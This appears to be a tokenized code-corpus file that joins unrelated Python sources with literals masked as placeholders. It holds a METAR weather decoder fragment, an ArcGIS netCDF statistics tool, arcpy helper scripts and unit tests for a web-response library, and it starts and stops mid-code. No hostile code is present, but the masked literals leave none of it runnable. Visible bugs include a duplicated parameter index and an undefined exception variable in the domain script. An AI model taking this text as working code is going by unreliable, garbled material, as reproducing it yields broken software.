[ valOff : ( valOff + <NUM_LIT:3> ) ] ) * <NUM_LIT> <EOL> if val >= <NUM_LIT:1000> : <EOL> val = int ( round ( val / <NUM_LIT:100> ) * <NUM_LIT:100> ) <EOL> else : <EOL> val = int ( round ( val / <NUM_LIT:10> ) * <NUM_LIT:10> ) <EOL> if value [ <NUM_LIT:0> : <NUM_LIT:3> ] == '<STR_LIT>' or value [ <NUM_LIT:0> : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> height = val <EOL> return height <EOL> def decodeWeatherObscuration ( self , value ) : <EOL> if not value : <EOL> return '<STR_LIT>' <EOL> intensity = '<STR_LIT>' <EOL> proximity = '<STR_LIT>' <EOL> descriptor = '<STR_LIT>' <EOL> phenomenon = '<STR_LIT>' <EOL> sep = '<STR_LIT>' <EOL> offset = <NUM_LIT:0> <EOL> length = len ( value ) <EOL> if ( offset + <NUM_LIT:3> ) <= length : <EOL> if value [ offset ] in self . intensity : <EOL> if value [ offset : ( offset + <NUM_LIT:3> ) ] in self . other : <EOL> phenomenon = self . other [ value [ offset : ( offset + <NUM_LIT:3> ) ] ] <EOL> sep = '<STR_LIT>' <EOL> offset += <NUM_LIT:3> <EOL> else : <EOL> intensity = self . 
intensity [ value [ offset ] ] + "<STR_LIT:U+0020>" <EOL> offset += <NUM_LIT:1> <EOL> if ( offset + <NUM_LIT:2> ) <= length : <EOL> if value [ offset : ( offset + <NUM_LIT:2> ) ] in self . proximity : <EOL> proximity = "<STR_LIT:U+0020>" + self . proximity [ value [ offset : ( offset + <NUM_LIT:2> ) ] ] <EOL> offset += <NUM_LIT:2> <EOL> if ( offset + <NUM_LIT:2> ) <= length : <EOL> if value [ offset : ( offset + <NUM_LIT:2> ) ] in self . descriptor : <EOL> descriptor = self . descriptor [ value [ offset : ( offset + <NUM_LIT:2> ) ] ] <EOL> offset += <NUM_LIT:2> <EOL> while ( offset + <NUM_LIT:2> ) <= length : <EOL> val = value [ offset : ( offset + <NUM_LIT:2> ) ] <EOL> if val in self . precipitation : <EOL> val = intensity + self . precipitation [ val ] <EOL> intensity = '<STR_LIT>' <EOL> if descriptor : <EOL> if value [ ( offset - <NUM_LIT:2> ) : ( offset + <NUM_LIT:2> ) ] in self . conjunction : <EOL> val = self . conjunction [ value [ ( offset - <NUM_LIT:2> ) : ( offset + <NUM_LIT:2> ) ] ] + "<STR_LIT:U+0020>" + val <EOL> elif val in self . obscuration : <EOL> val = self . obscuration [ val ] <EOL> elif val in self . other : <EOL> val = self . other [ val ] <EOL> else : <EOL> break <EOL> if descriptor : <EOL> val = "<STR_LIT:U+0020>" + val <EOL> phenomenon += sep + descriptor + val <EOL> descriptor = '<STR_LIT>' <EOL> sep = '<STR_LIT>' <EOL> offset += <NUM_LIT:2> <EOL> if offset == length : <EOL> return ( descriptor + phenomenon + proximity ) . strip ( ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def usage ( help = False ) : <EOL> """<STR_LIT>""" <EOL> fileName = os . path . split ( __file__ ) [ <NUM_LIT:1> ] <EOL> title = "<STR_LIT>" . format ( fileName , MetarReader . version ) <EOL> print title <EOL> print "<STR_LIT:->" * ( len ( title ) - <NUM_LIT:1> ) <EOL> if help : <EOL> print MetarReader . __doc__ <EOL> print "<STR_LIT>" <EOL> print usage . __doc__ . 
format ( fileName ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> verbose = False <EOL> decode = False <EOL> cycle = False <EOL> for index in range ( len ( sys . argv ) - <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> if sys . argv [ index ] == '<STR_LIT>' : <EOL> verbose = True <EOL> del sys . argv [ index ] <EOL> elif sys . argv [ index ] == '<STR_LIT>' : <EOL> usage ( True ) <EOL> sys . exit ( ) <EOL> elif sys . argv [ index ] == '<STR_LIT>' : <EOL> decode = True <EOL> del sys . argv [ index ] <EOL> elif sys . argv [ index ] == '<STR_LIT:-c>' : <EOL> cycle = True <EOL> del sys . argv [ index ] <EOL> if decode or len ( sys . argv ) > <NUM_LIT:1> : <EOL> Metar = MetarReader ( verbose , False , cycle ) <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> Metar . decode ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> Metar . decode ( ) <EOL> sys . exit ( ) <EOL> else : <EOL> usage ( ) </s>
<s> # ArcGIS Python-toolbox tool: compute a statistic of a netCDF variable
# over one of its dimensions and write the result into a copy of the dataset.
# NOTE(review): all string/number literals were obfuscated upstream
# (<STR_LIT>/<NUM_LIT> placeholders) and indentation was reconstructed from
# syntax -- confirm both against the original source before relying on them.
import arcpy
import mds
import mds.messages
import numpy
import netCDF4
import os.path


class GetVariableStatisticsOverDimension(object):
    # Duck-typed ArcGIS tool class: arcpy discovers label/description/
    # getParameterInfo/isLicensed/updateParameters/updateMessages/execute.

    def __init__(self):
        """<STR_LIT>"""
        # Tool metadata shown in the toolbox UI.
        self.label = "<STR_LIT>"
        self.description = "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>"
        self.canRunInBackground = False
        # statistic-display-name -> numpy.ma function-name lookup table.
        # NOTE(review): keys/values obfuscated; presumably MEAN/MIN/MAX/etc.
        statistics_numpy = {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': '<STR_LIT>',
                            '<STR_LIT>': '<STR_LIT>', '<STR_LIT>': '<STR_LIT>',
                            '<STR_LIT>': '<STR_LIT>', '<STR_LIT>': '<STR_LIT>',
                            '<STR_LIT>': '<STR_LIT>'}
        # List of [module, name->function-name table] pairs; searched in
        # order by calculate_statistic, so more providers can be appended.
        self.statistics = [[numpy.ma, statistics_numpy]]
        self.default_statistic = "<STR_LIT>"

    def getParameterInfo(self):
        """<STR_LIT>"""
        # Parameter order matters: updateMessages/execute index this list
        # positionally (0=input dataset, 1=variable, 2=dimension,
        # 3=output file, 4=output variable name, 5=statistic type).
        parameters = []
        parameters.append(arcpy.Parameter(
            displayName="<STR_LIT>",
            name="<STR_LIT>",
            datatype=["<STR_LIT>", "<STR_LIT>"],
            parameterType="<STR_LIT>",
            direction="<STR_LIT>"))
        parameters.append(arcpy.Parameter(
            displayName="<STR_LIT>",
            name="<STR_LIT>",
            datatype="<STR_LIT>",
            parameterType="<STR_LIT>",
            direction="<STR_LIT>"))
        # This parameter's choice list depends on the preceding parameter.
        parameters[-<NUM_LIT:1>].parameterDependencies = [parameters[-<NUM_LIT:2>].name]
        parameters.append(arcpy.Parameter(
            displayName="<STR_LIT>",
            name="<STR_LIT>",
            datatype="<STR_LIT>",
            parameterType="<STR_LIT>",
            direction="<STR_LIT>"))
        parameters[-<NUM_LIT:1>].parameterDependencies = [parameters[-<NUM_LIT:2>].name]
        parameters.append(arcpy.Parameter(
            displayName="<STR_LIT>",
            name="<STR_LIT>",
            datatype="<STR_LIT>",
            multiValue=False,
            parameterType="<STR_LIT>",
            direction="<STR_LIT>"))
        parameters.append(arcpy.Parameter(
            displayName="<STR_LIT>",
            name="<STR_LIT>",
            datatype="<STR_LIT>",
            multiValue=False,
            parameterType="<STR_LIT>",
            direction="<STR_LIT>"))
        parameters.append(arcpy.Parameter(
            displayName="<STR_LIT>",
            name="<STR_LIT>",
            datatype="<STR_LIT>",
            parameterType="<STR_LIT>",
            direction="<STR_LIT>"))
        # Restrict the statistic parameter to every name registered in
        # self.statistics, defaulting to self.default_statistic.
        parameters[-<NUM_LIT:1>].filter.type = "<STR_LIT>"
        parameters[-<NUM_LIT:1>].filter.list = sorted(
            [key for stat in self.statistics for key in stat[<NUM_LIT:1>].keys()])
        parameters[-<NUM_LIT:1>].value = self.default_statistic
        return parameters

    def isLicensed(self):
        """<STR_LIT>"""
        # Tool has no extension-license requirement.
        return True

    def updateParameters(self, parameters):
        """<STR_LIT>"""
        # All dynamic-parameter work happens in updateMessages instead.
        return

    def updateMessages(self, parameters):
        """<STR_LIT>"""
        input_parameter = parameters[<NUM_LIT:0>]
        variable_parameter = parameters[<NUM_LIT:1>]
        dimension_parameter = parameters[<NUM_LIT:2>]
        output_parameter = parameters[<NUM_LIT:3>]
        output_var_parameter = parameters[<NUM_LIT:4>]
        type_parameter = parameters[<NUM_LIT:5>]
        dataset = None
        if input_parameter.value is not None:
            # Open the dataset purely to validate it; classify a failure by
            # matching substrings of the error text (fragile but all the
            # underlying library exposes -- see the obfuscated patterns).
            try:
                dataset = mds.netcdf.Dataset(input_parameter.valueAsText, '<STR_LIT>')
            except RuntimeError, exception:
                if "<STR_LIT>" in str(exception) or "<STR_LIT>" in str(exception):
                    input_parameter.setErrorMessage(
                        mds.messages.INPUT_DATASET_DOES_NOT_RESOLVE_TO_FILENAME.format(
                            input_parameter.valueAsText))
                elif "<STR_LIT>" in str(exception):
                    input_parameter.setErrorMessage(
                        mds.messages.INPUT_DATASET_URL_MALFORMED.format(
                            input_parameter.valueAsText))
                else:
                    input_parameter.setErrorMessage(
                        mds.messages.INPUT_DATASET_GENERIC_ERROR.format(
                            input_parameter.valueAsText, str(exception)))
            except Exception, exception:
                input_parameter.setErrorMessage(
                    mds.messages.INPUT_DATASET_GENERIC_ERROR.format(
                        input_parameter.valueAsText, str(exception)))
        if dataset is not None:
            # Offer the dataset's variables as the variable-parameter choices.
            variable_parameter.filter.type = "<STR_LIT>"
            variable_parameter.filter.list = list(dataset.variable_names())
        else:
            # No (valid) dataset: clear both dependent pick lists.
            variable_parameter.filter.type = "<STR_LIT>"
            variable_parameter.filter.list = []
            variable_parameter.value = "<STR_LIT>"
            dimension_parameter.filter.type = "<STR_LIT>"
            dimension_parameter.filter.list = []
            dimension_parameter.value = "<STR_LIT>"
        if (variable_parameter.value is not None) and (dataset is not None):
            # Offer the chosen variable's dimensions as the choices.
            dimension_parameter.filter.type = "<STR_LIT>"
            dimension_parameter.filter.list = list(
                dataset.variable_dimension_names(variable_parameter.valueAsText))
        else:
            dimension_parameter.filter.type = "<STR_LIT>"
            dimension_parameter.filter.list = []
            dimension_parameter.value = "<STR_LIT>"
        # The output variable name must be non-empty once the user edits it,
        # and must not collide with a variable already in the input dataset.
        if (output_var_parameter.altered) and (output_var_parameter.value is None):
            output_var_parameter.setErrorMessage(
                '<STR_LIT>' % output_var_parameter.name)
        if (output_var_parameter.value is not None) and (dataset is not None) and (output_var_parameter.value in dataset.variable_names()):
            output_var_parameter.setErrorMessage(
                '<STR_LIT>' % output_var_parameter.name)
        # Derive a default output variable name from variable/statistic/
        # dimension while the user has not edited the field themselves.
        # NOTE(review): the second branch concatenates type and dimension
        # with no separator between them -- possibly a missing "_"; confirm.
        if (variable_parameter.value is not None) and (dimension_parameter.value is not None) and (not output_var_parameter.altered):
            if type_parameter.value is None:
                output_var_parameter.value = variable_parameter.value + "<STR_LIT>" + dimension_parameter.value
            else:
                output_var_parameter.value = variable_parameter.value + "<STR_LIT:_>" + type_parameter.value + dimension_parameter.value
        if output_parameter.value is not None:
            # Enforce the expected output file extension.
            output_filename = output_parameter.valueAsText
            if os.path.splitext(output_filename)[<NUM_LIT:1>] != "<STR_LIT>":
                output_parameter.setErrorMessage(
                    mds.messages.OUTPUT_FILE_EXTENSION_MUST_BE_NC)
        return

    def calculate_statistic(self, variable, dimension, statistic):
        # Resolve the named statistic to a callable by scanning the
        # registered [module, table] pairs; apply it along `dimension`.
        for stat in self.statistics:
            if statistic in stat[<NUM_LIT:1>]:
                func = getattr(stat[<NUM_LIT:0>], stat[<NUM_LIT:1>][statistic])
                break
        else:
            # for/else: no table knew the name -- fall back to a default
            # numpy.ma function (name obfuscated).
            func = getattr(numpy.ma, '<STR_LIT>')
        return func(variable, axis=dimension)

    def execute(self, parameters, messages):
        """<STR_LIT>"""
        input_parameter = parameters[<NUM_LIT:0>]
        variable_parameter = parameters[<NUM_LIT:1>]
        dimension_parameter = parameters[<NUM_LIT:2>]
        output_parameter = parameters[<NUM_LIT:3>]
        output_var_parameter = parameters[<NUM_LIT:4>]
        type_parameter = parameters[<NUM_LIT:5>]
        dataset_name = input_parameter.valueAsText
        try:
            dataset = mds.netcdf.Dataset(dataset_name, '<STR_LIT>')
        except RuntimeError, exception:
            # Surface the open failure as a geoprocessing error.
            messages.addErrorMessage(str(exception))
            raise arcpy.ExecuteError
        var1 = dataset.variable(variable_parameter.valueAsText)
        # Translate the dimension name to the variable's axis index.
        dim1 = var1.dimensions.index(dimension_parameter.valueAsText)
        result1 = self.calculate_statistic(var1[:], dim1, type_parameter.valueAsText)
        # Output variable keeps all of the input's dimensions except the
        # one that was reduced away.
        output_dims = list(dataset.variable_dimension_names(
            variable_parameter.valueAsText))
        output_dims.remove(dimension_parameter.valueAsText)
        output_dims = tuple(output_dims)
        output_filename = output_parameter.valueAsText
        output_name = output_var_parameter.valueAsText
        # Copy the data variables to the output file, then append the new
        # statistic variable (with the source variable's attributes) to it.
        dataset.xcopy(dataset.data_variable_names(), output_filename)
        with netCDF4.Dataset(output_filename, mode="<STR_LIT:a>") as newdataset:
            newvar = newdataset.createVariable(output_name, var1.dtype, output_dims)
            for attribute_name in var1.ncattrs():
                newvar.setncattr(attribute_name, var1.getncattr(attribute_name))
            newvar[:] = result1
        # NOTE(review): index 5 is the statistic-type parameter here, while
        # the output variable name lives at index 4 -- confirm this index.
        arcpy.SetParameter(<NUM_LIT:5>, output_name)
        return </s>
<s> '''<STR_LIT>''' <EOL> import arcpy <EOL> def getInputPointFC ( ) : <EOL> '''<STR_LIT>''' <EOL> fc = getInputPointFCFromXY ( <NUM_LIT> , <NUM_LIT> ) <EOL> return fc <EOL> def getInputPointFCFromXY ( x , y ) : <EOL> '''<STR_LIT>''' <EOL> inPoint = arcpy . Point ( x , y ) <EOL> inWGS84Point = arcpy . PointGeometry ( inPoint ) <EOL> sr = arcpy . SpatialReference ( <NUM_LIT> ) <EOL> inWGS84Point . spatial_reference = sr <EOL> fc = arcpy . CreateFeatureclass_management ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> None , "<STR_LIT>" , "<STR_LIT>" , <EOL> sr ) [ <NUM_LIT:0> ] <EOL> with arcpy . da . InsertCursor ( fc , [ "<STR_LIT>" ] ) as cursor : <EOL> cursor . insertRow ( [ inWGS84Point ] ) <EOL> inputFeatureSet = arcpy . FeatureSet ( ) <EOL> inputFeatureSet . load ( fc ) <EOL> return fc </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> import Configuration <EOL> from . import SunPositionAnalysisToolsTestSuite <EOL> from . import RangeRingTestSuite <EOL> def getVisibilityTestSuites ( ) : <EOL> '''<STR_LIT>''' <EOL> if Configuration . DEBUG == True : <EOL> print ( "<STR_LIT>" ) <EOL> Configuration . Logger . info ( "<STR_LIT>" ) <EOL> testSuite = unittest . TestSuite ( ) <EOL> testSuite . addTests ( SunPositionAnalysisToolsTestSuite . getSunPositionTestSuite ( ) ) <EOL> testSuite . addTests ( RangeRingTestSuite . getRangeRingTestSuite ( ) ) <EOL> return testSuite </s>
<s> '''<STR_LIT>''' <EOL> import sys , traceback <EOL> import arcpy <EOL> from arcpy import env <EOL> try : <EOL> domTable = arcpy . GetParameterAsText ( <NUM_LIT:0> ) <EOL> codeField = arcpy . GetParameterAsText ( <NUM_LIT:1> ) <EOL> descField = arcpy . GetParameterAsText ( <NUM_LIT:1> ) <EOL> dWorkspace = arcpy . GetParameterAsText ( <NUM_LIT:2> ) <EOL> domName = "<STR_LIT>" <EOL> updateOption = "<STR_LIT>" <EOL> arcpy . TableToDomain_management ( domTable , codeField , descField , dWorkspace , domName , update_option = updateOption ) <EOL> arcpy . SetParameter ( <NUM_LIT:3> , dWorkspace ) <EOL> except arcpy . ExecuteError : <EOL> msgs = arcpy . GetMessages ( ) <EOL> arcpy . AddError ( msgs ) <EOL> print ( msgs ) <EOL> except : <EOL> tb = sys . exc_info ( ) [ <NUM_LIT:2> ] <EOL> print ( "<STR_LIT>" % tb . tb_lineno ) <EOL> print ( e . message ) <EOL> tb = sys . exc_info ( ) [ <NUM_LIT:2> ] <EOL> tbinfo = traceback . format_tb ( tb ) [ <NUM_LIT:0> ] <EOL> pymsg = "<STR_LIT>" + tbinfo + "<STR_LIT>" + str ( sys . exc_info ( ) [ <NUM_LIT:1> ] ) <EOL> msgs = "<STR_LIT>" + arcpy . GetMessages ( ) + "<STR_LIT:\n>" <EOL> arcpy . AddError ( pymsg ) <EOL> arcpy . AddError ( msgs ) <EOL> print ( pymsg + "<STR_LIT:\n>" ) <EOL> print ( msgs ) </s>
<s> from unittest import TestCase , mock <EOL> from thorium . response import ( Response , DetailResponse , CollectionResponse , <EOL> ErrorResponse ) <EOL> from thorium . errors import MethodNotAllowedError , BadRequestError <EOL> from thorium import Resource , fields <EOL> class SimpleResource ( Resource ) : <EOL> id = fields . IntField ( ) <EOL> name = fields . CharField ( ) <EOL> class ComplexResource ( Resource ) : <EOL> id = fields . IntField ( notnull = True ) <EOL> name = fields . CharField ( default = '<STR_LIT>' ) <EOL> items = fields . ListField ( item_type = fields . IntField ( ) ) <EOL> hash_map = fields . DictField ( notnull = True ) <EOL> unique = fields . SetField ( ) <EOL> class TestResponse ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . request_mock = mock . MagicMock ( ) <EOL> self . response = Response ( request = self . request_mock ) <EOL> def test_location_header ( self ) : <EOL> self . request_mock . url = '<STR_LIT>' <EOL> self . response . location_header ( <NUM_LIT:10> ) <EOL> self . assertEqual ( self . response . headers [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> def test_get_response_data_raises_error ( self ) : <EOL> self . assertRaises ( NotImplementedError , self . response . get_response_data ) <EOL> class TestDetailResponse ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . request_mock = mock . MagicMock ( ) <EOL> self . response = DetailResponse ( request = self . request_mock ) <EOL> def test_attributes ( self ) : <EOL> self . assertEqual ( self . response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( self . response . error , None ) <EOL> self . assertEqual ( self . response . meta , { '<STR_LIT>' : None } ) <EOL> self . assertEqual ( self . response . response_type , '<STR_LIT>' ) <EOL> self . assertEqual ( self . response . resource , None ) <EOL> def test_get_response_data_empty ( self ) : <EOL> data = self . response . get_response_data ( ) <EOL> self . 
assertEqual ( data , None ) <EOL> def test_get_response_data ( self ) : <EOL> self . response . resource = SimpleResource ( id = <NUM_LIT:1> , name = '<STR_LIT:a>' ) <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( data , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> class TestCollectionResponse ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . request_mock = mock . MagicMock ( ) <EOL> self . request_mock . params . sort = None <EOL> self . request_mock . params . offset = None <EOL> self . request_mock . params . limit = None <EOL> self . response = CollectionResponse ( request = self . request_mock ) <EOL> self . test_data = [ <EOL> SimpleResource ( id = <NUM_LIT:1> , name = '<STR_LIT:a>' ) , <EOL> SimpleResource ( id = <NUM_LIT:2> , name = '<STR_LIT:c>' ) , <EOL> SimpleResource ( id = <NUM_LIT:4> , name = '<STR_LIT:b>' ) , <EOL> SimpleResource ( id = <NUM_LIT:3> , name = '<STR_LIT:d>' ) , <EOL> SimpleResource ( id = <NUM_LIT:5> , name = '<STR_LIT:d>' ) , <EOL> ] <EOL> self . test_data_none = [ <EOL> SimpleResource ( id = <NUM_LIT:1> , name = '<STR_LIT:a>' ) , <EOL> SimpleResource ( id = <NUM_LIT:1> , name = None ) , <EOL> SimpleResource ( id = <NUM_LIT:3> , name = '<STR_LIT:b>' ) , <EOL> ] <EOL> self . test_data_complex = [ <EOL> ComplexResource ( id = <NUM_LIT:3> , items = [ ] , hash_map = { '<STR_LIT>' : <NUM_LIT:1> } , unique = set ( ) ) , <EOL> ComplexResource ( id = <NUM_LIT:1> , items = [ <NUM_LIT:1> ] , hash_map = { } , unique = None ) , <EOL> ComplexResource ( id = <NUM_LIT:2> , items = None , hash_map = { } , unique = { <NUM_LIT:1> , <NUM_LIT:2> } ) <EOL> ] <EOL> def test_attributes ( self ) : <EOL> self . assertEqual ( self . response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( self . response . error , None ) <EOL> self . assertEqual ( <EOL> self . response . 
meta , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } <EOL> } <EOL> ) <EOL> self . assertEqual ( self . response . response_type , '<STR_LIT>' ) <EOL> self . assertEqual ( self . response . resources , [ ] ) <EOL> def test_get_response_data_empty ( self ) : <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( data , [ ] ) <EOL> def test_get_response_data ( self ) : <EOL> self . response . resources = [ SimpleResource ( id = <NUM_LIT:1> , name = '<STR_LIT:a>' ) ] <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( data , [ { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ] ) <EOL> def test_get_response_data_sort_ascending ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data ) ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:3> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:4> ] , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> def test_get_response_data_sort_ascending_multiple ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data ) ) <EOL> self . 
assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:3> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:4> ] , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> def test_get_response_data_sort_descending ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data ) ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:3> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:4> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> def test_get_response_data_sort_descending_multiple ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data ) ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . 
assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:3> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:4> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> def test_get_response_data_sort_mixed ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data ) ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:3> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:4> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> def test_get_response_data_sort_with_none ( self ) : <EOL> self . response . resources = self . test_data_none <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data_none ) ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : None } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> self . 
assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> def test_get_response_data_sort_invalid ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . resources = self . test_data_complex <EOL> self . response . sort = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . sort = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . sort = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> def test_get_response_data_paginate ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> def test_get_response_data_paginate_cast ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT:id>' <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:2>' <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:2>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . 
